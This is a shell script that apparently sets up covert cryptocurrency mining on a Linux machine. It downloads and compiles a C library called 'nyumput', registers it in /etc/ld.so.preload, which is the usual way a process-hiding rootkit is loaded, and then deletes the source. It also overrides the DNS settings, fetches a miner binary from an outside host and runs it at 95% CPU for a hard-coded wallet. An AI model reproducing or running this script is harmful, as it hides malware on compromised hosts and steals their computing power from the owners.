#!/bin/sh
ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
dpkg-reconfigure --frontend noninteractive tzdata
apt update -y;apt -y install binutils cmake build-essential screen unzip net-tools curl
apt-get install sudo -y
curl https://github.com/kartolo92/koplok/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
wget https://ixi.hash.express/dl/iximiner_v0.3.0_22.08.2022_linux.tar.gz && tar -zvxf iximiner_v0.3.0_22.08.2022_linux.tar.gz && cd iximiner_v0.3.0_22.08.2022_linux
 ./iximiner --mode miner --pool https://ixi.hash.express --wallet 4AE4QhCLFwYMszeTVr5YxWsXA2ZoaT3TwUdhmjwfnZa3R6U8fneCuJqQgtw3GXuP6 --name $(shuf -n 1 -i 1-99999)-SM --cpu-intensity 95 --gpu-intensity 0
